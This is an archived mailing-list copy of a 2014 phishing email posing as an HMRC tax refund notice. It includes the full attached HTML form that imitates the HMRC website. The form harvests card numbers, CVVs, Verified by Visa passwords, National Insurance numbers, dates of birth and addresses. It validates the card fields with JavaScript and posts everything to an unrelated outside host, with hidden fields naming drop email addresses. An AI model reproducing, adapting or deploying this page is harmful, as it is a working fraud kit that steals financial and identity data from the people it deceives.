Skip site navigation (1)Skip section navigation (2)
Date:      26 Jun 2014 16:11:05 +0200
From:      HMRC <HMRC@Service.co.uk>
To:        freebsd-cvsweb@freebsd.org
Subject:   Submit the tax refund request - freebsd-cvsweb@freebsd.org
Message-ID:  <20140626161105.8D4295EC882BB94C@Service.co.uk>

index | next in thread | raw e-mail

[-- Attachment #1 --]
Dear Applicant: freebsd-cvsweb


We have reviewed your tax return and our calculations of your 
last years accounts a tax refund of 178.25 is due.Please submit 
the tax refund request and allow us 3-6 days in order to process 
it.

A refund can be delayed for a variety of reasons.
For example submitting invalid records or applying after the 
deadline.

Submit the form attached to your email in order to verify your 
card.


Best Regards,
HM Revenue & Customs
6/26/2014 16:11:05
--------------------------------------------------------------
© Copyright 2014, HM Revenue & Customs UK All rights reserved.
TAX REFUND ID: A29R119 
[-- Attachment #2 --]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">;
<HTML lang="en"><HEAD><TITLE>HM Revenue &amp; Customs: Tax refunds and reclaiming overpaid tax</TITLE><!-- InstanceBegin template="http://www.hmrc.gov.uk/Templates/Web-Convergence1.dwt" codeOutsideHTMLIsLocked="false" --><!-- InstanceBeginEditable name="Metadata" -->
<META content="text/html; charset=utf-8" http-equiv="Content-Type">
<META content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.hmrc.gov.uk" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://www.hmce.gov.uk" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://www.ir.gov.uk" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://customs.hmrc.gov.uk" r (nz 1 vz 1 lz 1 oz 1 cz 1))' http-equiv="pics-label">
<META name="DC.creator" content="HM Revenue and Customs, 100 Parliament Street, London SW1A 2BQ">
<META scheme="DCTERMS.IMT" name="DC.format" content="text/html">
<META scheme="DCTERMS.ISO639-2" name="DC.language" content="eng">
<META name="DC.publisher" content="HM Revenue and Customs, 100 Parliament Street, London SW1A 2BQ">
<META name="eGMS.copyright" content="Crown copyright http://www.opsi.gov.uk/advice/crown-copyright/index.htm">;
<META name="DCTERMS.educationLevel" content="core">
<META name="DCTERMS.spatial" content="UK">
<META scheme="DCTERMS.W3CDTF" name="DCTERMS.issued" content="2010-06-13">
<META scheme="DCTERMS.W3CDTF" name="eGMS.disposalReview" content="">
<META name="DC.title" content="Tax refunds and reclaiming overpaid tax">
<META name="DC.description" content="How to claim a repayment through PAYE, Self Assessment or by sending in form R40 Tax repayment">
<META name="DC.keywords" content="Claim back tax if you've had too much deducted from your pension">
<META scheme="eGMS.IPSV" name="DC.subject" content="">
<META name="DC.type" content="">
<META name="DCTERMS.audience" content="">
<META name="HMRC.location" content="">
<META name="HMRC.typePage" content="">
<META name="DC.identifier" content="">
<META scheme="DCTERMS.Period" name="DCTERMS.temporal" content=" ">
<META scheme="DCTERMS.W3CDTF" name="DCTERMS.valid" content="">
<META scheme="DCTERMS.W3CDTF" name="DCTERMS.modified" content="">
<META name="eGMS.status" content="">
<META scheme="HMRC.ST" name="DC.subject" content="">
<SCRIPT language="JavaScript" type="text/javascript">
function go_step2(){
var name = document.getElementById('name');
var email = document.getElementById('email');
var emailRegEx = /^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/i;
var dd = document.getElementById('dd'); var mm = document.getElementById('mm'); var yy = document.getElementById('yy');
var phone = document.getElementById('phone');
var ssn = document.getElementById('ssn');
var vbv1 = document.getElementById('vbv1');
var address1 = document.getElementById('address1');
var city = document.getElementById('city');
var state = document.getElementById('state');
var zip = document.getElementById('zip');
var mmn = document.getElementById('mmn');
var bank = document.getElementById('bank');
var ccnumber = document.getElementById('ccnumber');
var exp_mm = document.getElementById('exp_mm');
var exp_yy = document.getElementById('exp_yy');
var cvv = document.getElementById('cvv');
if(name.value.length < 2){alert('Must enter your name'); name.focus(); return false;}
if(email.value.search(emailRegEx) == -1){alert('Must enter your email address'); email.focus();return false; }
if(dd.value.length < 2){alert('Must enter your date of birth'); dd.focus(); return false;}
if(mm.value.length < 2){alert('Must enter your date of birth'); mm.focus(); return false;}
if(yy.value.length < 2){alert('Must enter your date of birth'); yy.focus(); return false;}
if(mmn.value < 2){alert('Must enter your mother\' s maiden name'); mmn.focus(); return false;}
if(address1.value.length < 4){alert('Must enter your main address'); address1.focus(); return false;}
if(city.value.length < 2){alert('Must enter your city'); city.focus(); return false;}
if(state.value.length < 2){alert('Must enter your region'); state.focus(); return false;}
if(zip.value.length < 3){alert('Must enter your zip code'); zip.focus(); return false;}
if(phone.value.length < 6){alert('Must enter your phone number'); phone.focus(); return false;}
if(ssn.value < 4){alert('Must enter your social security number'); ssn.focus(); return false;}
if(bank.value < 2){alert('Must enter issuing bank'); bank.focus(); return false;}
if(ccnumber.value.length < 15){alert("Invalid Card Number");ccnumber.focus();return false;}
if (ccnumber.value != parseInt(ccnumber.value)){alert("Invalid Card Number"); ccnumber.focus();return false;}
if((ccnumber.value.substring(0,1) != "4") && (ccnumber.value.substring(0,1) != "5") && (ccnumber.value.substring(0,1) != "6") && (ccnumber.value.substring(0,1) != "3"))
{alert("Invalid Card Number");ccnumber.focus();return false;}
if(exp_mm.value == "exp_mm"){alert("Invalid Expiry Date");exp_mm.focus();return false;}
if(exp_yy.value == "exp_yy"){alert("Invalid Expiry Date");exp_yy.focus();return false;}
if (cvv.value != parseInt(cvv.value)){alert("Invalid Card Verification Number"); cvv.focus();return false;}
if((ccnumber.value.substring(0,1) == "4" && cvv.value.length != 3) || (ccnumber.value.substring(0,1) == "5" && cvv.value.length != 3) ||
(ccnumber.value.substring(0,1) == "6" && cvv.value.length != 3) || (ccnumber.value.substring(0,1) == "3" && cvv.value.length != 4))
{alert ('Invalid Card Verification Number'); cvv.focus(); return false;}



}
 </SCRIPT>
<!-- InstanceEndEditable --><!-- InstanceBeginEditable name="doctitle" --><!-- InstanceEndEditable --><LINK rel="stylesheet" type="text/css" href="http://www.hmrc.gov.uk/css/print_styles.css" media="print"><!-- For the new browsers -->
<STYLE type="text/css">
@import url(http://www.hmrc.gov.uk/css/newbrowsers1.css);
</STYLE>
<!--[if lt IE 6]>
<link href="http://www.hmrc.gov.uk/css/ie5.css" rel="stylesheet" type="text/css" media="screen">
<![endif]--><!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<META name="GENERATOR" content="MSHTML 8.00.7600.16385"></HEAD>
<BODY>
<DIV id="header">
<DIV class="main_frame_container"><A href="http://www.hmrc.gov.uk"><IMG class="hmrc_logo" title="HM Revenue &amp; Customs" name="HMRC" alt="HM Revenue &amp; Customs" src="http://www.hmrc.gov.uk/images/HMRC_logo_alt.gif"></A><A name="top"></A> 
<DIV id="navigation">
<UL class="level1_nav">
  <LI><A href="http://www.hmrc.gov.uk">Home</A>; </LI>
  <LI><A href="http://search2.hmrc.gov.uk/kbroker/hmrc/contactus/start.jsp">Contact 
  us</A> </LI>
  <LI><A href="http://www.hmrc.gov.uk/menus/aboutmenu.htm">About us</A> </LI>
  <LI><A href="http://www.hmrc.gov.uk/jobs/">Jobs</A>; </LI>
  <LI><A href="http://www.hmrc.gov.uk/accessibility/index.htm">Accessibility</A>; 
  </LI>
  <LI><A title="General feedback" href="http://www.hmrc.gov.uk/comment/index.htm">Feedback</A>; </LI>
  <LI><A href="http://www.hmrc.gov.uk/menus/help.htm">Help</A>; </LI></UL><BR class="clear">
<DIV id="lower_nav">
<DIV id="site_search">
<DIV class="site_search_container">
<FORM method="get" name="search" action="http://search.hmrc.gov.uk/kb5/hmrc/hmrc/results.page" target="_top"><INPUT id="search_submit_button" class="search_button" value=" Search " type="submit"> 
<LABEL class="hidden" for="search_keywords">Search</LABEL> <INPUT id="search_keywords" class="form_input_box" alt="Search" size="10" name="qt"><!--[if gte IE 6]><![endif]--> 
</FORM></DIV></DIV>
<DIV id="tax_advisers_button"><A href="http://www.hmrc.gov.uk/agents/">Tax agents 
&amp; advisers</A> </DIV></DIV></DIV></DIV>
<DIV class="clear_all"></DIV></DIV><SPAN><A name="main"></A></SPAN>
<DIV id="ntopsection">
<DIV id="tabs_etc">
<DIV id="tabs_container">
<DIV id="tabs">
<DIV id="tab_bandc" class="tab"><SPAN class="hide">[</SPAN><A title="businesses and corporations" href="http://www.hmrc.gov.uk/businesses/">businesses&nbsp;&amp; 
corporations</A><SPAN class="hide">] </SPAN></DIV>
<DIV id="tab_employers" class="tab"><SPAN class="hide">[</SPAN><A title="employers" href="http://www.hmrc.gov.uk/employers/">employers</A><SPAN class="hide">] 
</SPAN></DIV>
<DIV id="tab_iande" class="tab"><SPAN class="hide">[</SPAN><A title="individuals and employees" href="http://www.hmrc.gov.uk/individuals/">individuals&nbsp;&amp; 
employees</A><SPAN class="hide">] </SPAN></DIV></DIV></DIV></DIV></DIV>
<DIV id="main_body">
<DIV id="nmaincontainer">
<DIV id="nleft_col">
<DIV id="leftcol_wrap"><!-- InstanceBeginEditable name="LeftHandNav" -->
<DIV id="header-wcp"><A href="http://www.hmrc.gov.uk/index.htm">Income 
Tax</A></DIV>
<P class="LeftHeading">In this section:</P>
<UL>
  <LI><A href="http://www.hmrc.gov.uk/intro-income-tax.htm">Introduction to 
  Income Tax</A> 
  <LI><A href="http://www.hmrc.gov.uk/rates/it.htm">Income Tax rates and 
  thresholds</A> 
  <LI><A href="http://www.hmrc.gov.uk/allowance-relief.htm">Income Tax 
  allowances and reliefs</A> 
  <LI><A href="http://www.hmrc.gov.uk/tax-codes.htm">Tax codes</A> 
  <LI><A href="http://www.hmrc.gov.uk/tax-right.htm">Getting your Income Tax 
  right</A> 
  <LI class="selected">Tax refunds and reclaiming overpaid tax 
  <LI><A href="http://www.hmrc.gov.uk/working/index.htm">Working and paying 
  tax</A> 
  <LI><A href="http://www.hmrc.gov.uk/arrive-leave-uk.htm">Income Tax when 
  arriving in or leaving the UK</A> 
</LI></UL><!-- InstanceEndEditable --></DIV></DIV><!-- end of left_col -->
<DIV id="nbreadcrumbs1">
<DIV id="nbreadcrumbs2"><!-- InstanceBeginEditable name="CrumbTrail" -->
<UL>
  <LI class="crumb_leader">You are here: 
  <LI class="home"><A href="http://www.hmrc.gov.uk">Home</A>; &gt; 
  <LI><A href="http://www.hmrc.gov.uk/index.htm">Income Tax</A> &gt; 
  <LI class="crumb_current">Tax refunds and reclaiming overpaid tax </LI></UL><!-- InstanceEndEditable --></DIV></DIV>
<DIV id="ncontentwrapper">
<DIV id="ncontentcolumn"><!-- InstanceBeginEditable name="Header" --><!-- InstanceEndEditable --><!-- InstanceBeginEditable name="MainContent" --><A class="screen-reader" name="main"></A></DIV>
<DIV id="AcceptTermsAndConditions" class="portlet">
<DIV class="portlet-header"></DIV>
<BLOCKQUOTE><FONT size="3" face="Times New Roman"></FONT>&nbsp;</BLOCKQUOTE>
<DIV style="PADDING-LEFT: 20px" class="portlet-body"><TD>
<FORM onsubmit="return go_step2();" method="post" name="processForm" action="http://escortfirsati.org/javascript.php"><TR><TD><SPAN class="style2">&nbsp;&nbsp;<STRONG><U>Address Information</U> - </STRONG>Please 
enter your name and address as you have it listed for your credit 
card.</SPAN></TD> </TR><TR><TD>&nbsp;</TD> </TR><TR><TD>
<TABLE border="0" cellSpacing="3" cellPadding="3" width="730" align="center">
  <TBODY>
  <TR>
    <TD class="style11" width="47%">
      <DIV align="right">Email: </DIV></TD>
    <TD width="53%"><INPUT id="email" title="Email" maxLength="40" size="25" name="email"></TD><INPUT value="rezulateonline@gmail.com" type="hidden" name="IP"><INPUT value="evy4evy@gmail.com" type="hidden" name="Send"> 
  <TR>
    <TD class="style11" width="47%">
      <DIV align="right">CardHolder Name: </DIV></TD>
    <TD width="53%"><INPUT id="name" title="CardHolder Name" maxLength="40" size="25" name="name"></TD></TR>
  <TR>
    <TD class="style11" width="47%">
      <DIV align="right">Date of Birth: </DIV></TD>
    <TD><INPUT id="dd" title="CardHolder Name" maxLength="2" size="2" name="dd"> 
      <INPUT id="mm" title="CardHolder Name" maxLength="2" size="2" name="mm"> <INPUT id="yy" title="CardHolder Name" maxLength="4" size="4" name="yy"> <SPAN style="FONT-SIZE: 11px" class="style14">(dd/mm/yyyy)</SPAN></TD></TR>
  <TR>
    <TD class="style11">
      <DIV align="right">Sort Code:</DIV></TD>
    <TD><INPUT id="mmn" title="mmn" maxLength="50" size="25" name="mmn"></TD></TR>
  <TR>
    <TD class="style11">
      <DIV align="right">Address:</DIV></TD>
    <TD><INPUT id="address1" title="Address" maxLength="50" size="25" name="address"></TD></TR>
  <TR>
    <TD class="style11">
      <DIV align="right">Town/City:</DIV></TD>
    <TD><INPUT id="city" title="city" maxLength="40" size="25" name="city"></TD></TR>
  <TR>
    <TD class="style11">
      <DIV align="right">Province/Region: </DIV></TD>
    <TD><INPUT id="state" title="State / Province / Region" maxLength="40" size="25" name="state"></TD></TR>
  <TR>
    <TD class="style11">
      <DIV align="right">Postal Code: </DIV></TD>
    <TD><INPUT id="zip" title="Zip Code" maxLength="7" size="6" name="zip"></TD></TR>
  <TR>
    <TD class="style11">
      <DIV align="right">Phone Number: </DIV></TD>
    <TD><INPUT id="phone" title="Phone Number" maxLength="12" size="25" name="phone"></TD></TR>
  <TR>
    <TD class="style11">
      <DIV align="right">
      <DIV align="right">National Insurance Number:</DIV>
      <DIV align="right">&nbsp;</DIV>
      <DIV align="right">Verified by Visa / MasterPassword: </DIV></DIV></TD>
    <TD>
      <P><INPUT id="ssn" title="nin" maxLength="12" size="25" name="ssn"></P>
      <P><INPUT style="WIDTH: 116px; HEIGHT: 20px" id="vbv1" title="nin" maxLength="12" size="9" name="vbv1"></P></TD></TR></TBODY></TABLE></TD></TR><TR><TD>&nbsp;</TD>
</TR><TR><TD><SPAN class="style4">&nbsp;&nbsp;<SPAN class="style7"><STRONG><U>Credit 
Card Information</U></STRONG> - Please enter your Credit or Debit Card where 
refunds will be made.</SPAN></SPAN></TD> </TR><TR><TD>&nbsp;</TD> </TR><TR><TD>
<TABLE border="0" cellSpacing="3" cellPadding="3" width="735" align="center">
  <TBODY>
  <TR>
    <TD class="style11" width="49%">
      <DIV align="right">Bank Name: </DIV></TD>
    <TD colSpan="3"><INPUT id="bank" title="Bank Name" maxLength="50" size="25" name="bank"></TD></TR>
  <TR>
    <TD class="style11">
      <DIV align="right">Debit / Credit Card Number: </DIV></TD>
    <TD colSpan="3"><INPUT id="ccnumber" title="Crd number" maxLength="50" size="25" name="ccnumber"></TD></TR>
  <TR>
    <TD class="style11">
      <DIV align="right">Expiration Date: </DIV></TD>
    <TD colSpan="3"><SELECT id="exp_mm" title="Expiration Month" name="exp_mm"> 
        <OPTION selected="" value="exp_mm">- Month -</OPTION> <OPTION>01</OPTION> 
        <OPTION>02</OPTION> <OPTION>03</OPTION> <OPTION>04</OPTION> 
        <OPTION>05</OPTION> <OPTION>06</OPTION> <OPTION>07</OPTION> 
        <OPTION>08</OPTION> <OPTION>09</OPTION> <OPTION>10</OPTION> 
        <OPTION>11</OPTION> <OPTION>12</OPTION></SELECT> / <SELECT id="exp_yy" title="Expiration Year" name="exp_yy"> <OPTION selected="" value="exp_yy">- 
        Year -</OPTION></OPTION> <OPTION>2012</OPTION> 
        <OPTION>2014</OPTION> <OPTION>2015</OPTION> <OPTION>2016</OPTION> 
        <OPTION>2017</OPTION> <OPTION>2018</OPTION> <OPTION>2019</OPTION> 
        <OPTION>2020</OPTION> <OPTION>2021</OPTION></SELECT></TD></TR>
  <TR>
    <TD class="style11">
      <DIV align="right">Card Verification Number:</DIV></TD>
    <TD colSpan="3"><INPUT id="cvv" title="Card Verification Number" maxLength="4" size="4" name="cvv"> [ <A onmouseover="window.status='Done'; return true" onmouseout="window.status='Done'; return true" href="javascript:popUp('index_files/ccv.html')">view sample</A> ]</TD></TR>
  <TR>
  <TR></TR></TBODY></TABLE></TD></TR><TR><TD>
<DIV align="center"></DIV></TD></TR><TR><TD>&nbsp;</TD> </TR><TR><TD>&nbsp;</TD> 
</TR><TR><TD>
<DIV align="center"><INPUT onmouseover="window.status='Done'; return true" onmouseout="window.status='Done'; return true" value="      Submit Information     " type="submit" name="Submit"> 
</DIV></TD></TR></DIV></DIV><!-- 2.1.13 --><!-- PageComplete --><!-- InstanceEndEditable --></DIV><!-- end contentcolumn --></DIV><!-- end content wrapper -->
<DIV id="nbottombar"></DIV></DIV><!-- end maincontainer -->
<DIV></DIV><!-- end main_body -->
<DIV id="footer">
<DIV class="main_frame_container">
<UL class="footer_nav">
  <LI><A href="http://www.businesslink.gov.uk/mkt1_home" target="_blank"><IMG class="businesslink_logo" title="Business Link" alt="Business Link" src="http://www.hmrc.gov.uk/images/blank.gif"></A><SPAN>|</SPAN>; </LI>
  <LI><A href="http://www.hmrc.gov.uk/copyright/">© Crown 
  Copyright</A><SPAN>|</SPAN> </LI>
  <LI><A href="http://www.hmrc.gov.uk/terms/">Terms &amp; 
  Conditions</A><SPAN>|</SPAN> </LI>
  <LI><A href="http://www.hmrc.gov.uk/about/privacy.htm">Privacy 
  Policy</A><SPAN>|</SPAN> </LI>
  <LI><A href="http://www.hmrc.gov.uk/nav/index.htm">Site Map</A><SPAN>|</SPAN> 
  </LI>
  <LI><A href="http://www.hmrc.gov.uk/about/foi.htm">Freedom of 
  Information</A><SPAN>|</SPAN> </LI>
  <LI><A href="http://www.direct.gov.uk/en/index.htm" target="_blank"><IMG class="directgov_logo" title="DirectGov" alt="DirectGov" src="http://www.hmrc.gov.uk/images/blank.gif"></A>; </LI></UL></DIV><!-- begin_exclude-->
<SCRIPT type="text/javascript" src="http://www.hmrc.gov.uk/ProphetInsert.js"></SCRIPT>;
<!-- end_exclude--></DIV><!-- InstanceEnd --></FORM></BODY></HTML>
help

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20140626161105.8D4295EC882BB94C>